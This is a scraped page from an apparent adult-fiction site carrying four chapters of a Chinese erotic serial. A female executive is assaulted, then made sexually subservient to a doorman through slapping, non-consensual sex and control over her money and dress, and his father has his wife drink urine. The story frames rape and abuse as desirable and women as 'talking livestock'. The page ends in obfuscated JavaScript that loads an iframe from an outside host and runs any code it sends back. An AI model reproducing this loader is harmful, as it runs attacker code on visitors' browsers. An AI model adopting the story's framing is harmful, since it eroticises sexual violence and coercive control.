字幕網- 每日更新 永久免費


            女高管和門衛帥哥(1)
  一女高管被搶,被門衛搭救三十七歲的夢霞是一個國際大公司的女高管。經
過幾段不成功的戀情,夢霞把心思全都放到了工作上。夢霞還是很有能力的,幾
年裏就從公司新手升到部門總監,手下二三十號人。本來她不是個爭強好勝的人,
但是公司的快速擴展和她固執認真的態度很快被領導發現。夢霞也有了過去從來
沒有過的自信。
  夢霞買了套中等的公寓,雖然不算大也不豪華,但是她還是很喜歡它的簡單,
方便。樓盤是業主們維權成功趕走原來物業後大家自己找的。門衛小吳是個帥氣
的小夥子,健壯但不粗魯。門衛養了一條大狗叫大汪,他自己說是為了陪他度過
寂寞時光,同時可以看家護院。業主們對小夥子都很信賴也喜歡大汪。夢霞也覺
得住著有安全感。
  但是危險總是在你沒有防備是到來。夢霞出差趕回家,下了出租就直奔家門。
  門衛小吳帶著大汪到路口買包煙,沒在門房。夢霞想也沒想就開門進去了,
沒有注意到門後有個黑影已經注視著自己飽滿的肥臀和豐碩的乳房。本來就是個
要搶錢的賊,但是看到包在裙子裏的肥臀,賊的雞巴就開始指揮大腦了。就在夢
霞打開樓梯門的一霎那,挺著雞巴的賊一把將她退到牆角,沒等她反應過來,一
隻粗糙的大手覆在了夢霞的紅唇上。夢霞本能的扭曲身體要掙脫,但是獸性大發
的賊的另一隻手已經摸到了夢霞的大腿深處。女人的小褲頭哪裏是男人欲望大手
的對手。手指和繃緊的褲頭夾得夢霞下麵的小嘴唇生疼。就在她要分開腿放棄掙
紮時,一聲狗叫驚醒了夢霞。她用力退了一下淫賊,接著砰的一聲,淫賊嚎叫著
跑開了。
  小吳回來的正是時候,夢霞捂著被淫賊扯掉了幾根陰毛的肥逼,驚魂未定。
小吳很快為夢霞真理好衣服扶她回家。小吳問要不要報警,夢霞羞愧的搖搖頭。
她有些害怕,不想回想為什幺自己那幺快就要放棄了,最糟糕的是她流了一褲子
的淫水,不知如何向警察解釋。如果不是小吳的出現,那賊的大雞巴大概已經順
利地插進自己的肉洞了。想著想著,夢霞的逼又濕了。
            女高管和門衛帥哥(2)
  二門衛帥哥拿下女高管夢霞請了一天假,稍定驚魂開始上班。她要顯的堅強,
特別是在手下男人麵前。開會時,她看著幾個帥氣男孩的臉和崇拜她的目光,不
敢想象如果他們知道自己差點兒就劈開腿讓人強奸,他們會怎幺看自己。如果他
們看到自己濕潤的肥逼,大概要認為自己是個淫婦。
  從此,每天回家看到門衛小吳在門房她都感到很安全,生怕小吳不在。幾次
她甚至在外麵轉了半個小時等小吳回來。小吳早已發現了夢霞的舉動。那天他看
到了夢霞褲頭外扯亂的陰毛,也看到了地上一小撮,知道了夢霞忍了多大的疼痛。
  小吳發現了夢霞等他回來才進樓,知道了這個女人注定是他的了,他要讓夢
霞心甘情願的讓自己拔光剩下的陰毛。這個女人是個好品種。
  帥哥門衛開始主動和夢霞接近,從簡單的打招呼,到閑聊,一個星期下來,
小吳就開始為夢霞接包裹,搬東西進屋。夢霞覺得一切很自然,已有的安全感和
小吳的熱情使她對這門衛有了好感。終於一天小吳覺得時機到了,等夢霞回家進
樓,麵帶猶豫的問,「霞姐,我明天放假,願不願意去一起看個電影?」夢霞一
愣,雖然有些驚訝,但是小吳樸實帥氣的臉讓她沒有覺得任何危險,很自然的說,
「可以呀,你請客」。「那當然」小吳馬上回答。
  看電影的過程很簡單,小吳對夢霞照顧周到,夢霞覺得小吳沒有初戀情人的
青澀,也沒有相親見麵的老大哥那幺猥瑣,很規矩認真自信。但是感覺也不像是
男朋友,沒那幺親近。這倒讓夢霞感到更安全。看完電影,小吳送夢霞回家,一
直送到門口。夢霞禮貌的問,「進來坐坐吧」。小吳爽快的說「好的,謝謝」,
沒有一點緊張或興奮。進屋後,夢霞請小吳坐下,自己去房間換衣服。等夢霞換
好衣服出來發現小吳正在整理屋子,而且把幾盆屋裏的花搬到了窗前。小吳問,
「花得見太陽,你不介意吧?」「是啊,我忙得沒時間管他們」,夢霞不好意思
的說。
  從此小吳經常到夢霞家,給夢霞整理房間,重新布置家具,還定了規矩要夢
霞遵守,比如吃什幺早飯,天冷了穿什幺衣服,出差準備什幺東西。夢霞覺得隻
有老媽比他想得周到。
  這天夢霞下班回來,小吳已經把飯做好。夢霞洗了個澡穿著睡衣出來,小吳
知道時機到了,嚴肅但是平和的講,把睡衣脫了做到我身邊來。夢霞一愣,但是
在這個救了自己又給了自己這幺多幫助的人麵前,讓她覺得很安全,即使是聽到
了這種超出一般的要求,她並沒有發怒或反抗。相反,夢霞對小吳的帥氣,勇氣
和愛護已經很依賴,和任何雌性動物一樣,夢霞下意識裏盼著小吳對她感興趣。
  於是夢霞脫了睡衣坐在小吳邊上開始吃飯。小吳若無其事的吃著,一往常一
樣和夢霞閑聊。夢霞既感到興奮,榮幸,又有些害怕,不知道小吳要幹什幺。
  吃完飯夢霞開始收拾桌子,小吳揮手止住說,「先等等。站到我麵前來,兩
手放在脖子後麵,我要好好看看我的女人。」夢霞沒想到自己一下成了帥哥的女
人,雖然是自己向往,但是來的方式太突然。但是夢霞還是照做了。第一次把自
己展現在一個年輕帥哥麵前,夢霞兩腿之間開始濕潤。她在想今晚小吳會不會操
自己。這幺一想,下麵不由自足的分泌出更多的淫水。
  小吳神情淡定,上下打量著這個女高管。身材不錯,奶子充實飽滿,但又不
是大得不真實。小吳站起了抱住夢霞,嘴吻到了夢霞的嘴。夢霞張開嘴迎合,雙
手不由得放下了也抱住了小吳。但是小吳卻推開夢霞,揮手給了夢霞一個實在的
嘴巴。「我沒有讓你把手放下來。」夢霞像犯了錯的小孩低下頭,把手放回原位,
眼裏不由得流出了委屈的眼淚。小吳的指責沒錯,自己是沒聽話,但是覺得挨打
還是不應該。小吳手撫著女高管的黑發,輕聲說,「我的女人最重要的就是要聽
話,不聽話的女人我不養。我不這樣要求你,給你懲戒,你會犯更大的錯誤。」
  說著手握成了拳頭,抓住一把秀發把夢霞的頭仰起來,嘴重新吻到夢霞的嘴
上。
  夢霞馬上把剛才的那一巴掌忘了,又沉浸在熱吻的刺激裏。小吳的舌頭猛地
插到了夢霞的嘴裏,很快找到了夢霞的舌頭。兩片肉很快交織在了一起,夢霞感
到渾身酥軟,都快站不住了,可是她不敢把手放下來抱著小吳或者扶著什幺。
  就在夢霞感到要站不住時,小吳的舌頭突然拔了出去,一時夢霞的舌頭不由
得跟了出去,貪婪的尋找它的夥伴。小吳說:「把桌子收拾了,擦幹淨」夢霞緩
過神來,連聲答應,好好。很快桌子收拾完了也被擦的鋥亮。「爬桌子上,手抓
著桌角別動。」夢霞感覺到要發生什幺了,她不想反抗,因為小吳說了她是他的
女人,雖然她還沒同意。接著小吳把夢霞的兩個腳踢開,夢霞開始有些害怕了,
這是強奸還是做愛?夢霞自己也說不清。夢霞不是處女,過去和男朋友也熱火朝
天過。但是男友大多太注意夢霞是否有快感,是否高潮,對自己雞巴的信心不是
很足,更有一個直接問自己的雞巴大不大。
  過去挨操的思緒還沒想玩,夢霞感到小吳的雞巴頭在自己的逼口上下蹭,逼
水很快抹到了小麵小嘴的四周,小吳輕輕的一使勁雞巴就進入了夢霞的身體,那
幺自然,那幺輕鬆,這不是強奸但是絕對沒有得到夢霞的同意。小吳的雞巴很大,
夢霞沒有感受過的大。夢霞慶幸自己淫水流了很多,不然這大雞巴可得把自己操
死。
  小吳專心的享受著女高管濕漉漉的逼,佩服自己的眼力。本來就是見義勇為,
沒想到這逼如此輕易的就上鉤了。小吳長得帥氣,操過的逼也不少,從打工妹到
熟女也算是嚐過不少味道了。不過女白領,還是高管就太少了。可能接觸的人群
裏沒有,而且畢竟人還是勢利的。小吳不怪城裏人看不上自己,他從山溝裏出來
就很不易了,也沒指望自己成為真正的城裏人,打幾年工回家淘個媳婦,有點兒
自己的地種種挺好。小吳不喜歡在城裏被人呼來喚去,但是為了生存小吳可以忍。
  現在錢沒有賺到,但是收入不菲的逼卻套在了自己的雞巴上,生活真是難以
預料。
  越想小吳越興奮,不知不覺發現胯下的逼正一鬆一緊的夾著自己的雞巴。原
來夢霞已經被操得要高潮了。小吳不禁叫好,好逼!啪,一巴掌打在大屁股上,
像趕馬一樣。夢霞好像懂了小吳的意思,開始迎合著小吳的插送,像匹快馬一樣
在小吳的胯下跳動。很快兩個人,,,不對是一個男人和他的馬子在快速的震動
中高潮了,小吳濃濃的精液噴射到夢霞的子宮裏。
  稍作喘息,小吳把雞巴拔出來,坐回到椅子上,看著趴在桌子上喘氣的夢霞,
小吳說,「起來,站我前麵來」。夢霞從桌子上爬起來,捋了捋散亂的頭發走到
小吳麵前。夢霞低著頭不敢看小吳,自己也奇怪為什幺不敢看這個比自己小的農
村小子。可能是因為不知道該如何麵對這個剛剛操完自己的帥哥,還是因為小吳
和她以前的男友沒有一點兒共同點,她不知道後麵會發生什幺?
  「把手放回到腦後,抬頭看著我,我好好和你談談。」小吳的語氣和神情和
老板對手下訓話一樣。
  「你已經是我的女人了,但是你還不是我的女朋友,更不是未婚妻什幺的。」
  聽到這裏,夢霞不由得又開始流淚了,不知道為什幺。是委屈?操完了還不
是女朋友?可是的確夢霞不覺得自己是小吳的女朋友。
  「在外麵我們還是以前一樣,我做你的門衛,你是業主。但是在這房間裏,
我是主人,你是我的女人。女人最重要的是聽話,我會幫助你學會的,你自己也
要努力。」
  夢霞站著認真聽著。和挨操前一樣赤裸著站著,手在腦後,奶子和逼展現在
小吳麵前。不同的是現在淫水和小吳的精液正在順著大腿往下流。而且淫水還在
流,小吳的每句話都好像是在往外擠她的淫水。「我不怕別人知道你是我的女人,
但是我還不想打亂你的生活。你還要認真工作,把事情幹好。我不需要一個隻會
操的逼。」夢霞點著頭,覺得小吳說得有道理。自己真的沒法和家人和同事解釋
為什幺會和一個保安好,而且還不是他的女朋友。「好了,幫我把雞巴清理幹淨。」
  夢霞看了一眼剛操完自己的大雞巴,自己不聽話的逼不僅又一緊,有一股淫
水從逼裏流了出來。夢霞正要轉身去拿紙,被小吳叫住,「不要拿紙,太不環保,
用嘴。」夢霞紅著臉趴到小吳胯間,認真的用舌頭把軟下來的雞巴上上下下舔了
個幹淨。
             女高管和門衛(3)
  夢霞照常工作,小吳對自己沒有任何變化。一樣熱情的幫助,禮貌的打招呼,
好像什幺也沒有發生。連眼神裏都沒有一絲的流露。夢霞卻時不時會想自己被操
的經曆,每次坐在飯桌旁吃飯下麵都會淫水泛濫。夢霞真不知道自己是怎幺了。
  到了周末,夢霞回到家看到小吳坐在椅子上等著她。「累嗎?」小吳問。
  「不累」夢霞弱弱的說,完全沒有剛才在公司裏自信和理直氣壯。「吃飯吧」。
  小吳讓夢霞坐下兩個人安靜的吃完飯。吃完了夢霞沒敢動,等著小吳告訴她
幹什幺。小吳讓她把碗收了然後趴在桌子上。夢霞心碰碰直跳,期待著小吳的大
雞巴進入自己。小吳從後把手伸到夢霞肚子前麵,解開腰帶,一下把夢霞的褲子
扒了下來。夢霞的腿有些軟了,逼裏開始流水了。「以後不許穿褲子了,必須穿
裙子。
  我的女人隨時都要準備好被操。「可是小吳沒有操她,而是扒開她的屁股蛋
子,扒開陰唇,看到濕潤的逼口,」好逼,不過白天上完廁所要清洗幹淨,別穿
的挺體麵的,留個髒逼給主人。「夢霞羞愧的沒有辦法,從來沒有人這幺說過自
己。
  畢竟自己是個老板,但在小吳麵前夢霞就是個孩子,不懂事的孩子。啪,夢
霞屁股一股劇痛,「聽明白了嗎?怎幺不答應?」「是,我明白」。小吳滿意的
拍拍大白屁股,「去洗個澡,完了回來趴好」。夢霞趕快爬起來,提著褲子去衛
生間。
  洗完澡,夢霞下麵的小嘴流著哈喇子趴在桌子上等著小吳的大雞巴。小吳也
不客氣,雞巴一口氣就插進去了。小吳深入淺出,一下插到底,慢慢拔出到隻有
雞巴頭在夢霞的小洞裏。這是小吳在很多肥逼上練出來的,不是新手可以馬上學
會的。發情的肥逼水多濕滑,稍不注意雞巴就整個拔出來了,要不然就是抽插短
促。夢霞當然是沒有享受過這種待遇,很快就又像撒韁的野馬在小吳雞巴上有節
奏的跳動。
  操完了,小吳又讓夢霞站在麵前擺好姿勢。「表現不錯,水不少。我沒看錯
你。你願意做我的女人嗎?」夢霞有點兒疑惑,自己光著屁股站在這裏,手聽話
的放在腦後,腿上流淌著他的精液,他才問自己想不想做他的女人?但是夢霞還
是點點頭,不好意思直視小吳。「那就好。我挺喜歡你的,但是我不知道你有沒
有勇氣跟著我。以後看你的表現,我們可以多在一起。來把我的雞巴清理幹淨。」
  夢霞點點頭,開始用嘴把自己的淫水和小吳的精液舔幹淨。
  從此之後,小吳操夢霞的次數多了,每次一起吃晚飯夢霞都自覺的趴在桌子
上讓小吳操。有時小吳要值班,就把夢霞叫到值班室,讓她光著身子蹲在桌子下
麵幫他舔雞巴。小吳麵如常態的和進進出出的業主打招呼。如果有人需要小吳出
來,小吳就客氣說聲等一下,然後提上褲子出去。夢霞就心情忐忑的光著身子等
著,直到小吳的雞巴再次出現在自己麵前,夢霞用嘴和小吳再次鏈接在一起。夢
霞從來沒有感到小吳的任何要求過分,因為她把自己當成小吳的女人,而且夢霞
下決心要做個稱職的女人。
  因為性交次數增多,夢霞身上女人發情的氣息不由得散發出來,在大街上,
也在公司裏。一個對夢霞垂涎已久的高層開始注意自己。一次晚上開會晚了,這
位高層自告奮勇的送夢霞回家。夢霞的身體,或者說是她的逼,已經開始預備著
被操。夢霞扭動著腰肢,為空虛的下體找歌能夠滿足的壓力點。高層看得有些流
鼻血,一進入夢霞的樓道就迫不及待的吧夢霞抱住。夢霞是想被操,但是她期盼
的是小吳的大雞巴,那個可以用雞巴頭把她的逼口撐大的雞巴,不是個五十歲的
老雞巴。夢霞開始掙紮,大叫救命。小吳從傳達室跑出來一把拉開高管推倒在地
上,並說要電話報警。高管連忙說,小夥子別打,我們認識,就是個誤會。「什
幺誤會,都喊救命了還是誤會」。夢霞不想把事情搞大,以一個女白領的口氣說,
「不用了,我認識他,讓他走就好了」。小吳看了看,「既然女事主不計較,我
就不報警了。下次看你來我馬上叫警察,快走。」雖然平時高層對這種保安沒什
幺好臉色,但是畢竟不想見警察,對夢霞說了句對不起和謝謝就灰溜溜的走了。
  小吳不想在公共場合引起注意,就小聲對夢霞說,「回去洗個澡擺好姿勢等
著我」然後就走了。
  一會兒小吳打開夢霞的門,看到夢霞聽話的赤裸著身子站著,滿意的點點頭。
  「他是誰呀?」
  「是另外一部門的老板。」「他怎幺那幺大膽」「我不知道」夢霞低著頭好
象是自己做錯了什幺。「不是你的錯,這種垃圾哪裏都有。」夢霞感謝小吳的理
解,濕著眼睛說謝謝。夢霞覺得小吳太好了,總是很理解她,還保護她。
  小吳說,「我看是對外公開的時候了,省得老色鬼們總惦記著你。我可不想
和別人分享我的女人。願意做我的女朋友嗎?」夢霞沒有想到小吳願意收自己做
女朋友,激動的連連點頭,高興的眼淚啪嗒啪嗒的掉下來。「想做還哭什幺。做
我的女朋友還是我的女人,規矩不能變,但是我們可以公開在一起。」
  夢霞終於忍不住了,「你操我吧」小吳滿意的笑了,手伸到夢霞兩腿之間,
感到了濕潤的逼。「跪下,作為我的女朋友,你可以吃掉我的精液。用嘴把你的
食物弄出來。」
  「我想來」夢霞紅著臉,她的確太像感受到小吳帶給她的高潮了,放下所有
白領和高管的架子,請求,也可以說是乞求麵前的帥哥讓自己高潮。「看你表現,
吃飽了我讓你來個夠」夢霞趕快跪下,貪婪的吸允著大雞巴,手握著蛋蛋,想趕
快嚐到主人精液的味道,等著主人把自己弄高潮。
  小吳看到夢霞如此聽話雞巴也忍不住了,撐滿了夢霞的小嘴,手抱著美麗聰
明的頭顱,使勁操著夢霞的嘴。那頭顱裏裝的知識,高管的尊嚴,人的尊嚴都和
裝著腦子的腦袋一樣被這個小學文化的門衛操著,而且是那幺心甘情願的被操。
  淫水在一滴一滴的從女高管的下身流出,這明明就是隻發情的雌性動物,和
草原上的野馬,非洲的母獅子,甚至夏天裏的雌性蒼蠅沒什幺區別。區別是挨操
的是口若懸河的嘴。
  很快小吳來了,夢霞喝幹了濃稠的精液,舔幹淨嘴唇微笑著期待知道小吳如
何操自己,難道他還能大起來?
  小吳讓夢霞趴回到桌子上。可能是因為在這桌子上高潮的次數太多,夢霞條
件反射的開始喘息,心跳加快,小穴一張一熄的等著被插。
  小吳穿好衣服,把食指插入夢霞的逼。「你在外麵還是女白領,要好好幹,
努力工作。做得不好我可是要打屁股的。」邊說,小吳邊用食指操夢霞。「過兩
天和我出去吃個飯,看個電影什幺,算是個對外的公開聲明。」說著小吳把中指
也插到了夢霞的肉洞裏。「以後我就搬到你這裏住,安心上班,我把這裏管好。」
  小吳把手指拔出來,沾了點兒夢霞的淫水塗在她的屁眼上,然後把無名指和
中指插回到夢霞的陰道裏,拇指慢慢揉著進入了夢霞的屁眼。夢霞有點兒驚訝但
是已經躲不開了,隻能任憑小吳的手指揉插。最後小吳像拿保齡球一樣三個手指
捏緊了女高管的屁股,拇指和中指隔著女高管的腸子和陰道壁對著捏。「你的身
體是我的,你的靈魂也是我的。在別人特別是員工麵前我會給你留麵子,到了家
裏你得知道自己的位子。」小吳使勁捏了肉壁一下,然後開始快速的抽插。「我
喜歡你發騷的樣子,你出水就是對我的很好的回答。動起來,趕快高潮吧!」說
著像拎保齡球一樣拎了拎夢霞的大肥屁股。夢霞扭著屁股尋找高潮的爆炸點,最
後陰道終於碰到了爆炸點。小吳看著手裏的女高管興奮到了極點,一把抓住夢霞
的頭發,把她的頭拽得揚起來,有提高了保齡球的位置,把剛成為自己女友的女
人彎成了個反的蝦米。夢霞有一次感受到前所未有的刺激,像一頭母野獸一樣放
聲吼道「啊啊啊……」
             女高管和門衛(4)
  自從成了門衛的女朋友,女高管感覺到小吳對自己比以前親熱了,特別是在
別人麵前。小吳像他所說的帶著女高管吃飯看電影,小吳找的都是很有情調的地
方,價錢當然不菲。每次都是女高管結帳。一開始夢霞怕小吳麵子上過不去,畢
竟一般都是男孩兒出錢,但是小吳好像無所謂,沒有一點兒不好意思或者擔心的。
  很快四周的人發現了兩個人的關係,特別是小吳搬到夢霞的公寓裏以後,經
常進出。有幾次小吳到公司接夢霞,公司裏的人也知道夢霞找了個年輕帥氣的小
夥子。雖然小吳穿著不算土氣,但是看得出來不是白領階層。公司裏的人奇怪一
直很清高自信的夢霞怎幺會和一個沒什幺事業的年輕人在一起。不過夢霞在公司
裏還是有些地位,別人也不敢瞎議論。夢霞的幾個從小在一起的閨蜜知道夢霞要
強,過了好長一段時間才委婉的問夢霞和小吳是如何認識的。夢霞一想到小吳就
不由得加緊了雙腿,怕淫水流出來,有所保留的說,「在我們公寓樓認識的」。
  漸漸的大家也知道了小吳保安的身份。夢霞對手下和不熟的人往往是用「關
你屁事」的口氣敷衍回答。慢慢的大家也習慣了,發現小吳人不錯,也沒什幺壞
毛病,就不再瞎猜了。
  小吳的朋友也很驚訝。幾個過去的工友知道小吳搒上了個女高管,背後調侃
小吳吃起軟飯來了。小吳也不以為然,花夢霞的錢理直氣壯。一次酒後,小吳的
幾個朋友開玩笑,「小吳,你不會是真吃軟飯吧,哈哈」小吳隨意答道,「吃軟
飯是讓人養著聽別人的,我養個大奶牛,喝她的奶難道還要給她付錢?」幾個人
聽了大笑,小吳你還真能狡辯。小吳沒和他們多廢話,打哈哈就過去了。
  回到家裏夢霞還是很聽話。小吳搬進來時帶著他的大狼狗大汪。吃完飯夢霞
擺好姿勢站在小吳麵前,大汪也端正的坐在小吳麵前。小吳每次都是先拍拍大汪,
和大汪擁抱戲鬧幾下才和夢霞說話。夢霞每次都是光著屁股站著,不敢亂動。小
吳說「夢霞,以後在家你就叫小汪。雖說你歲數比大汪大,但是在這家裏大汪先
跟的我,你是後跟的我。你是他妹妹,知道嗎?」
  「是的」夢霞幹脆的回答道。夢霞知道,和小吳在一起隻能回答「是的」,
不能反對。
  「我不在,大汪負責保護你。你要照顧好大汪」「是的」「趴好了」夢霞迫
不及待的趴到桌子上扭著大屁股等著小吳的大雞巴。小吳看著旁邊的大汪說「看
這大屁股,是我的,你不能操。將來我給你找個媳婦,讓你操個夠」說著開始操
女高管。
  小吳很快接管了夢霞家裏的一切。夢霞褲子都被扔掉了,隻有裙子。所有的
內褲都換成了GString .胸罩隻留了一個在給小吳脫衣表演時穿,平時不
許穿胸罩。夢霞的錢也有小吳管理,小吳每天給夢霞零錢吃飯應酬。買東西要小
吳批準。
  夢霞發現一下省下很多錢,自己以前沒事就逛商店瞎買東西的習慣被小吳徹
底管住了。小吳還重新布置了公寓,客廳裏沒有了女人的東西。夢霞的娃娃全都
放到一個臥室,算是夢霞的窩。小吳和大汪住主臥室,夢霞睡自己的窩。小吳一
直是在飯桌上操夢霞,從沒在床上操過。
  一天,吃完飯小吳操著夢霞「小汪,我要見見你父母了。操你那幺久了還沒
見過生你的人呢。明天打個電話訂個時間」「是的,主人」
  日子訂好了,夢霞父母都很高興,因為一直未夢霞這個老剩女的婚事著急,
都覺得要放棄了,沒想到竟然夢霞有要帶男朋友回家了。小吳穿戴整齊買了點兒
水果,煙酒就帶著夢霞來到了夢霞父母家。
  夢霞的媽叫阿芳,五十五了,但是保養的很好,皮膚華潤,體態豐滿。夢霞
的大肥屁股就是隨他媽。夢霞的爸叫老唐,人很好,但是六十幾了雞巴已經硬不
起來了,阿芳的大屁股已經很久沒有被操了。
  看到夢霞和一個年輕帥哥回來,老唐和阿芳很高興。小吳散發著一種年輕健
壯的男性氣息,阿芳不自覺的就心跳加快。老唐為女兒找到個帥哥高興。一番寒
暄以後,吃飯聊天,很快老唐和阿芳知道了小吳就是個打工仔,還是個保安,之
前的興奮少了不少。不過阿芳的老逼還是忍不住流水了,她看到了小吳褲襠裏鼓
鼓的。老唐也沒有太大意見,隻要夢霞高興,老唐就放心了。吃完飯阿芳戀戀不
舍得看著小吳和夢霞離開。
  小吳感到了阿芳的饑渴,很快想好了捕獲阿芳的方法。
  幾個星期後,夢霞放假小吳讓夢霞準備幾件衣服一起出門。上了火車後,小
吳告訴夢霞他們是去見小吳的父母。夢霞很高興,她真的感覺到自己是小吳的女
朋友,而且很有可能做小吳的老婆。小吳把手伸進夢霞的裙子裏,兩個手指插入
了夢霞濕漉漉的逼。夢霞抱著小吳的胳膊,假裝睡著了,但是心跳的很快。在眾
多的人麵前被小吳的手指操到高潮讓夢霞很興奮。
  夢霞真的睡著了,逼裏夾著小吳的手指睡著了。等夢霞感到逼裏一下空虛了,
發現車已經到站了。小吳壞笑著擦著手指,下車了。
  小吳父母的家在各小村子裏。很多人都出去打工了,應為這裏太窮了。夢霞
的確有些不習慣,但是想到這是小吳的家,她還是盡量找好的地方。小吳家在村
子裏算是大的,但也就是三間房,土地磚牆,沒有什幺裝飾。但比起來還算幹淨。
  小吳的父親是個個子不高但是很壯的農民,叫老吳。小吳的母親是個看上去
和藹可親的老太太。小吳家一看就是重男輕女,吃飯時小吳和老吳坐在桌子上,
小吳媽拉著夢霞坐在邊上的小桌上。
  「兒子,這個姑娘不錯。」老吳說,好像夢霞不在屋裏。「胯挺寬,能生養」。
  「我還沒打算要小孩,您別急著抱孫子。她是公司高管,輸入不少。這是孝
敬您的錢」。小吳說道。
  「你在城裏花銷多,以後就不用給我錢了。這地方也沒什幺可花的,我這幾
畝地幾頭牲口足夠了。小孩還是要趕快生,我看這丫頭歲數不小了吧?」
  「比我大八歲,但是很健康。我上個月剛帶她去檢查身體。我就是想讓她多
賺點兒錢,小孩兒是個女人就能生。」
  夢霞聽著很不自在,甚至有點兒生氣。但是好像小吳說的又句句是實話,紅
著臉聽兩個男人談論自己。小吳媽小聲對夢霞說,「你想不想要小孩呀?」
  「想,但是沒決定呢。」
  「噢,讓柱子決定把,你就好好過你的。有了孩子也是個幸福事兒,比掙多
少錢都重要」
  老吳看見兩個女人竊竊私語,「老娘兒們少在下麵插嘴,用你的嘴吃飯。」
  「娘這毛病還沒改,哈哈」
  「就是,女人和牲口一樣,總有點兒毛病脾氣改不了,不吃辮子屁股就癢癢」。
  小吳媽馬上低頭吃飯。夢霞看了也不敢說話了。
  老吳接著說,「這城裏的女人你小子管得住嗎?我見的城裏女人都拿一把,
像這種能賺錢的腦子很活蹦的不更野?」
  「女人都一樣,城裏女人就是少管教。爹我看您也眼饞了吧,我給您演示一
下」「眼饞?你小子也沒規矩了,村裏的逼老子都操過,要不是你媽那肚子肥沃
馬上就懷上你了,你小子還不定從誰肚子裏出來呢」
  小吳笑笑,知道老吳嘴硬但是肯定對這城裏女人的樣子好奇。小吳對夢霞說,
「小汪,過來。」
  夢霞放下碗筷咽了嘴裏的飯站起來。
  「站在炕前頭,擺好姿勢。」
  夢霞知道小吳是讓自己脫光了擺好在家接受訓話的姿勢,但是她還從來沒在
小吳意外的人麵前這樣過。看到夢霞猶豫,小吳眼神一下變得凶狠了,夢霞不禁
打了個冷顫,紅著臉開始脫衣服。等衣服脫光了,夢霞低著頭不敢直視兩個男人。
  小吳媽瞥了幾眼,還是老老實實的吃飯。
  老吳眼睛一亮,的確是覺得城裏女人和他操過的所有女人都不一樣。「小子,
這城裏女人的確是不一樣啊。這三十幾歲的皮膚和大傻剛娶的二十幾的大閨女差
不多,怎幺養的?」
  「大傻的媳婦您嚐過了?」
  「沒有,就是鬧洞房時扒了衣服看看」
  小吳把手伸到夢霞兩腿之間,沾了沾流出來的淫水給老吳看,「怎幺樣,水
也多,操起來可他媽舒服了」
  夢霞真相挖個洞鑽進去,但是她不敢,怕惹小吳生氣。同時她為小吳這幺滿
意自己的身體自豪。
  「看著我」,老吳說。夢霞抬起眼看著老吳。
  「柱子看上你是你的福氣,看來老子沒白教他。這裏都是家裏人,你不用臉
紅。臉紅是挨操的表現,我可不操我兒子的女人。你得記得誰是你的主人知道嗎?
  要是胡來,老子可是到城裏一樣收拾你。「
  「爸,您別嚇唬她了,她挺聽話的。不聽話還用您去收拾她。小汪,給爸看
看你的濕逼。」
  夢霞轉過身彎下腰,扒開自己的屁股蛋子,把屁眼和逼展現在男人麵前。
  「不錯,不下種兒可惜了。」老吳說。
  「行了,回去吃飯吧,把衣服穿上」。
  夢霞穿好衣服回到位子上繼續吃飯。小吳媽已經吃完了,問老吳「你還要飯
嗎?」
  老吳不能在兒子麵前示弱,雖然自己的老婆又老又醜了,但是還是要顯示一
下,特別是在夢霞麵前。
  「不用了,過來給老子舒坦舒坦。小吳媽猶豫了一下,但是馬上到老吳麵前,
解開褲子把老吳的雞巴掏出來,頭低下把整個含在嘴裏。
  老吳享受著老舌頭的舔舐說,「我老了操不動了,這老娘兒們也沒什幺可操
的了,我把她訓練成夜壺了。」小吳說,「真有您的,哈哈。媽,老爸的黃湯好
喝嗎?」小吳媽點點頭。
  老吳喝了幾瓶啤酒這是正是要上廁所,顯備一下夜壺的本領。老吳按住小吳
媽的頭,鬆開膀胱,尿液湧出。小吳媽使勁的吸,有節奏的把消化過的啤酒咽下
肚子。等老吳尿完了,抓著小吳媽的頭發看著小吳媽,「喝飽了嗎?」「飽了」。
  老吳回手給了小吳媽一大嘴巴,小吳媽馬上把臉擺回原處,等著下一巴掌。
老吳摸摸老婆子的臉說,「這臭老婆子也就能當個尿壺了,等我老了爬不起來了,
這尿壺的用處可大了,現在訓好了,以後好用。小子,你媽的新本事怎幺樣?」
  「還是老爸有本事,想當初老媽也是婦女主任呢,您把國家幹部當尿壺用,
哈哈」
  「國家幹部怎幺了,是女人兩腿之間就是兩個洞。再說老子雞巴也不比以前
了,這老娘兒們的逼我也操不動了,改成夜壺也算是廢物利用。」夢霞想不到這
爺倆這幺形容小吳的媽。更驚訝的是小吳媽沒有一點兒不高興的表情,反而好像
挺自豪的看了看自己,仿佛再說小妞學著點兒。
  老吳看到夢霞驚訝的表情說,「你該學的東西還多著呢,別以為掙幾個錢就
能當好我們家的女人。女人就是會說話的牲口,男人管著養著女人,要的就是女
人聽話能下仔,能幹活,能操。咱村裏的牲口大部分是我訓的,誰家有烈性的牲
口都是我去處理。但是隻要聽話,我就給他好吃的,給她梳毛保證她過得舒服。
  我還保護她,不讓猛獸傷害她。女人也一樣,你做好你的女人,其他事情我
擔著。」

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:蝶兒
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};